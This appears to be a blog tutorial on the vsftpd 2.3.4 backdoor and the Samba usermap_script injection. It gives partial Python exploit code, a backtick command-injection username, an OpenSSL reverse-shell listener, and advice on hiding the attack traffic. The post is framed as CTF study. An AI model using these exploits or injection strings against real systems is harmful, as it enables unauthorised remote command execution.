A look at CVE-2011–2523 and CVE-2007–2447
An easy win but with hidden dangers
In this blog post, we’ll go through the CVEs, write Python scripts to exploit them, and expose the dangers of these CVEs regarding OPSEC. You might ask: “Why am I covering these old CVEs?”. I’m covering them because we can always learn from past vulnerabilities while also learning new things.
CVE-2011–2523
This CVE is a backdoor in the vsftpd FTP server version 2.3.4. The master site hosting the downloadable client had a backdoored version uploaded. The backdoor works by checking if the username string ends with a smiley face “:)”; after which it calls vsf_sysutil_extra(). The called function then binds to port 6200 and awaits a connection. Any command then issued to that port gets executed via execl.
The snippets of the backdoored code are available here. Once we understand the exploit, we can go about automating it.
Dangers
While it may be tempting to abuse the vulnerability to gain an easy win, there are hidden dangers when using this exploit. Both FTP and the backdoor operate over unencrypted protocols. Hence, any attacker could capture a Wireshark trace of your exploit and be privileged to the same information you obtained.
In case you would like to avoid this danger. We can do the following:
- If using Metasploit to exploit the backdoor, consider using the
reverse_opensslpayload. - If using an exploit script, consider starting a Metasploit handler, then upgrading said handler to a Meterpreter shell. Meterpreter is encrypted by default.
Even with these measures, the initial requests are sent unencrypted.
Python script
The script uses Python’s ftplib and pwntool libraries while incorporating multithreading. The script consists of two functions connect_ftp() and connect_shell().
def connect_ftp():
ftp = FTP()
ftp.connect(args.ip, args.port) #don't you love sharing data
ftp.login("lol:)", "yeah__no")
def connect_shell():
time.sleep(1)
r = remote(args.ip, 6200)
r.interactive()This exploit sends all data unencrypted. One should use it just for CTFs. As always, the script is available here.
CVE-2007–2447
CVE-2007–2447 is a remote code execution vulnerability in Samba 3.0.0 through 3.0.25rc3. Attackers can obtain code execution by supplying a username with backticks in it.
The exploit is already detailed here, but to summarize: the username we enter is combined with the script in smb.conf then the combined string is executed via our friend execl from before.
Since we are executing a shell command, we only need command injection which is achieved through the use of backticks. Instead of executing something like:
/bin/sh sh -c /etc/samba/scripts/mapscript.sh "Username"
we execute:
/bin/sh sh -c /etc/samba/scripts/mapscript.sh "Username `payload`"
Knowing how to execute commands allows us to create a python script.
Python script
As always, the entire script will be available on the GitHub repo. This script utilizes OpenSSL to create a secure reverse shell.
Side note: Since the first part of the request is still sent over SMB, it will be visible in Wireshark logs
First we generate our certificates for the server:
print("Generating keys for the server...")
os.system("openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' 2>/dev/null") # -subj doesn't matter, use whatever you wantAfter which we create a thread that will connect to the Samba client:
def Listener():
sleep(1) #wait for the listener to start
try:
conn = SMBConnection(username, password, '', '')
conn.connect(args.ip, 139)
except Exception as e:
sys.exit(e)
t1 = threading.Thread(target=Listener, daemon=True, name='Listener').start()And finally, we start the listener:
os.system(f"openssl s_server -quiet -key key.pem -cert cert.pem -port {args.port}")
Conclusion
This post showed some simple CVEs, created a Python script for each and highlighted the dangers of using unencrypted reverse shells.
Further, Wireshark logs of different types of shells used in Metasploit where shown.
Consider following me if you have learned anything new :)
